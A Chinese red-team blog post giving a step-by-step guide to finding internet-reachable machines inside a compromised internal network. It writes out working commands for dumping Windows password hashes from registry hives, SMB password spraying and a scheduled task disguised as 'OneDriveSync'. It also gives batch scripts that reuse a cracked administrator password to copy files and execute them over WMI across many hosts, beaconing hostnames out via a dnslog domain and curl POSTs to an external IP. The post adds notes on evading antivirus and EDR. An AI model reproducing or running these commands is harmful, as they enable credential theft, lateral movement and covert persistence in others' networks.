如何在目标内网中快速定位 出网机

0x01 实战场景说明

    长期以来，非常多的组织，机构，企业...由于各种各样的原因，为加大对内网的管控力度，可能会通过各种各样的手段，去限制内网机随意访问外网，比如，针对普通办公网的各种商业安全审计系统，针对DMZ的各种acl策略限制 ， 各种"软硬"隔离 等等等...诸如此类

    日常内网渗透中，可能会经常遇到这样的情况，拿到webshell之后发现当前机器无法正常访问外网(不能出网)， 经简单尝试 DNS，Tcp，Udp，icmp... 均无法正常出( 此处的Tcp，主要针对 80，443，53，8080，21，110 这些穿透性稍好的端口)

    确实，利用各种正向代理依然可以继续去搞内网，甚至做维持，搞内网可能问题不大，但如果是维持，成本可能就稍微有些高了，所以，最好的方式还是能想办法找台能正常出网的内网机稳住才行，以此作为后续的长期入口( 依然是那句话，当前机器不出网，不代表所有机器都不出网，当前内网段不出网，也不代表所有内网段都不出网，慢慢耐心找，体力活，同样，此处暂不考虑极个别极端情况)，ok，前面都是废话，接着就简单来看下，怎么在目标内网中去批量找出网机

0x02 实操过程

第一步，提取所有本地用户密码hash

    假设前期通过Web提到了一台目标内网机权限，发现其无法正常出网后，接着走正常流程，先把本地hash提取一下，解密得知administrator的明文密码为admin!@#45，注意，此处的reg转储动作大部分杀软/EDR基本都不太会干预 ( 360套装[卫士 + 杀毒]并未拦 )

# cd c:/users/public# reg save HKLMSYSTEM sys.hiv# reg save HKLMSAM sam.hiv# reg save hklmsecurity security.hiv# secretsdump_windows.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL# del *.hiv secretsdump_windows.exe /F

第二步，批量SMB喷射

    拿着上面解出的密码，对指定内网存活机进行批量SMB喷射 (即所有开了135端口的ip列表，因为后需要利用wmi远程执行[计划任务和系统服务也是同理，扫445的IP即可]) ，check.bat 如下 smbcheck.exe 放到bat同目录下

smbbru.exe -s 192.168.159.0/24 -u administrator -p admin!@#45 -t 12

    由于喷射过程时间稍长，故可直接利用本地计划任务去起它 (注，部分杀软/EDR可能会拦截schtasks.exe)

# schtasks /create /RL HIGHEST /F /tn "OneDriveSync" /tr "C:/Users/Public/check.bat" /sc DAILY /mo 1 /ST 08:25 /RU SYSTEM# schtasks /query | findstr "OneDriveSync"# schtasks /run /tn OneDriveSync# schtasks /delete /F /tn OneDriveSync

    稍等片刻，最终喷射结果如下，其实有很多管理员自身是有一定的安全意识的，只是不怎么完善，或者说懒，嫌麻烦而已，比如，他也确实也知道要把自己的系统密码设的复杂一些，但日常要管理的机器数量可能比较庞大，加之工作繁杂，图方便省心，就免不了会出现一个密码通杀一批机器的现象，所以，只要想办法抓到一些关键的系统账号密码，估计很多机器都要跟着受牵连，即使不能通杀很多，但其它的系统密码可能也都是基于现在的这个密码演变的，不妨试着猜猜

    第三步，最后，拿着上面喷射成功的列表，开始批量查找出网机( 即 出网刺探 )

    NetInfo.bat 如下， 刺探项主要包括 DNS，TCP的 80，443，53，8080端口，其它端口后续可根据自己的实际情况酌情加( icmp，udp此处暂不做说明 )

ping %COMPUTERNAME%.%PROCESSOR_ARCHITECTURE%.9345mt.dnslog.cn -n 2 -w 2for %%k in (80,53,8080,443) do @C:userspubliccurl.exe -X POST -d "{ %COMPUTERNAME%.%PROCESSOR_ARCHITECTURE% }" --connect-timeout 2 -m 3 --retry 1 -k --retry-delay 1 -s --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36" --referer "https://www.baidu.com" http://21.227.183.159:%%k

    scan.bat 如下 [ 注，此处用的wmic去远程执行，故暂不考虑 2008以下的系统，另外，由于远程执行命令默认调的cmd.exe，360会拦，但也并不是所有的杀软/EDR都会拦 ] 

@echo off for /f "delims=" %%i in (host.txt) do @(  echo.  echo %%i Rce Begining ...  net use \%%ic$ /user:"administrator" "admin!@#45" > null  copy NetInfo.bat \%%ic$userspublic /y > null  copy curl.exe \%%ic$userspublic /y > null  echo.  wmic /node:%%i /user:".administrator" /password:"admin!@#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"  ping 127.0.0.1 -n 42 > null  echo.  echo.  del \%%ic$userspublicNetInfo.bat /F  del \%%ic$userspubliccurl.exe /F  net use \%%ic$ /del  > nul)

    Wmic.exe 本身其实也是支持直接批量远程执行的，但实际中经常会出现命令没有执行成功的情况，所以，还是直接用批处理for一下比较稳妥

wmic /node:@iplist.txt /user:".administrator" /password:"admin!@#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"

    
    最终， 实际的 批量出网刺探 效果如下，注意，此处的dnslog 平台非常建议不要直接用别人的，自己搭一个就好，反正都是基础设施的一部分，必不可少

    执行脚本前，记得先到自己的VPS上把那些向外刺探的端口全部同时监听起来，主要通过这个看下到底 哪台机器的哪个端口能正常接到数据，后续迁徙到对应的那台机器上操作即可

# nc -lkvp 80

小结:

    至止，关于内网出网机批量查找就结束了，非常简单，之前经常有弟兄会问到，所以此处就做一次集中说明，实战中还是建议把上面脚本的功能全部再用其他语言自行重新实现，文中所有的脚本仅作demo效果参考，包括之前文章中的各种脚本，仅仅也都只是为了做demo效果演示，实际存活率可能并不怎么样，故，最好的方式还是要自己动手丰衣足食，ok，还是那句话，一篇文章只解决一个实际问题，就不多废话了，有任何问题，也欢迎弟兄们及时反馈，祝好运

    如果觉得确实还不错，也欢迎积极转发留言，以便让更多真正需要的人都能看到，如遇到文中错误，也欢迎随时私信指正，非常感谢

周末的清晨可能需要一首这样的音乐来解乏

    非常期待能和更多真正志同道合弟兄一起深入交流学习，( 还是那句话，维护不易，乱七八糟的人就不要来了，非常感谢 )

本文始发于微信公众号（红队防线）：如何在目标内网中快速定位 出网机